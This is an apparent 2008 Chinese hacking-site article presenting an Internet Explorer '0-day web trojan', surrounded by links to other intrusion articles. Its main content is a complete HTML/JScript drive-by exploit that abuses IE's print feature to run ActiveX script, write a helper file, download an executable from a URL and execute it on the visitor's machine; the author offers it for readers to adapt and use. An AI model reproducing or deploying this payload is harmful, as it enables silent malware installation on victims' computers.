·	IE的0DAY网马	05-27	·	XP下双开3389远程控制的	05-27
·	利用IAT hook实现window	05-27	·	让Windows Server 2008上	05-27
·	让Windows Vista插上MAC	05-25	·	萤火虫无限量免费网盘	05-25
·	窝窝免费空间网提供100M	05-25	·	社会工程学巧骗网易相册	05-23
·	详解还原系统保护技术原	05-23	·	一条命令免疫autorun.in	05-23
·	Mantis多个输入验证漏洞	05-23	·	PHP168 X-Forwarded-For	05-23
·	首页巡警v1.1/1.0 本地提	05-23	·	Firefox安全设置	05-23
·	火眼金睛如何识别系统恶	05-23	·	易联网络为您提供150m美	05-23
·	巧妙查看Windows Server	05-22	·	玩转卡巴斯基的19招，让	05-22
·	建立一个别人不能碰的无	05-21	·	卸诺顿 WinXP丢失IP无法	05-21
·	揭秘灰鸽子运行原理(含手	05-21	·	DIY QQ:想要啥样就改啥样	05-21
·	PCSHARE VIP 2005源代码	05-21	·	NBSI_1.157源代码	05-21
·	刷BIOS到EFI破解，Vista	05-21	·	弘毅网提供100M免费asp空	05-21
·	转移Vista脱机文件减压V	05-20	·	改进BitLocker浅谈Vista	05-20

[推荐]IE的0DAY网马

荐 ★★★★★

IE的0DAY网马

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-5-27 9:25:28

哈哈。标题吸引吗。
修改代码请注意不能使用双引号”，注意不能跨域，还有一些其他零碎的问题自己调试吧。
这个漏洞执行后可以远程下载任意文件并执行。
第一次写网马，只好拿鸡PP搓成鸡胸，这样垃圾的漏洞才能放出来~哈哈。

不过。这个漏洞利用的好也可以玩一玩的。

以下是引用片段：

<html>
<body>
Print me with table of links to execute
<a href="http://www.bla.com?x=b<script defer >
var    ForWriting    =    2;
var    strFile    =    'c:\\test2.js';
var    objFSO    =    new    ActiveXObject('Scripting.FileSystemObject');
var    objStream    =    objFSO.OpenTextFile(strFile,ForWriting,true,false);
objStream.WriteLine('var objArgs = \'http://127.0.0.1/test.exe\';');
objStream.WriteLine('var objargss =\'c:\\\\gtest.exe\';');
objStream.WriteLine('var sGet=new ActiveXObject(\'ADODB.Stream\');');
objStream.WriteLine('var xGet = false;');
objStream.WriteLine('try {');
objStream.WriteLine('xGet = new XMLHttpRequest();');
objStream.WriteLine('} ');
objStream.WriteLine('catch (trymicrosoft) {');
objStream.WriteLine('try {');
objStream.WriteLine('     xGet = new ActiveXObject(\'Msxml2.XMLHTTP\');');
objStream.WriteLine('} ');
objStream.WriteLine('catch (othermicrosoft) {');
objStream.WriteLine('     try {');
objStream.WriteLine('       xGet = new ActiveXObject(\'Microsoft.XMLHTTP\');');
objStream.WriteLine('     } ');
objStream.WriteLine('catch (failed) {');
objStream.WriteLine('       xGet = false;');
objStream.WriteLine('     }');
objStream.WriteLine('}');
objStream.WriteLine('}');
objStream.WriteLine('xGet.Open (\'GET\',objArgs.toLowerCase(),0);');
objStream.WriteLine('xGet.Send();');
objStream.WriteLine('sGet.Mode=3;');
objStream.WriteLine('sGet.Type=1;');
objStream.WriteLine('sGet.Open();');
objStream.WriteLine('sGet.Write (xGet.ResponseBody);');
objStream.WriteLine('sGet.SaveToFile (objargss.toLowerCase(),2);');
objStream.WriteLine('var x=new ActiveXObject(\'WScript.Shell\');');
objStream.WriteLine('x.Run(objargss);');
objStream.Close();
var    objShell    =    new    ActiveXObject('wscript.shell');
objShell.Run(strFile);
</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章：社会工程学巧骗网易相册密码

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

完全解析网页后门和挂马	04-02
真实的网络攻击取证纪实	03-27
利用404错误页面挂马	03-21
解密风暴	03-21
社会工程学在黑客中的应用	01-02
轻轻松松解密各种网页木马	12-21
SA权限无xp_cmdshell时取权限又一	12-14
sqlserver2005中恢复xp_cmdshell	11-10
实现无net.exe和net1.exe添加系统	10-26
用U盘轻松去除XP管理员密码	10-26
教你多种保护措施限用移动硬盘	10-09
bat 延时执行命令	10-09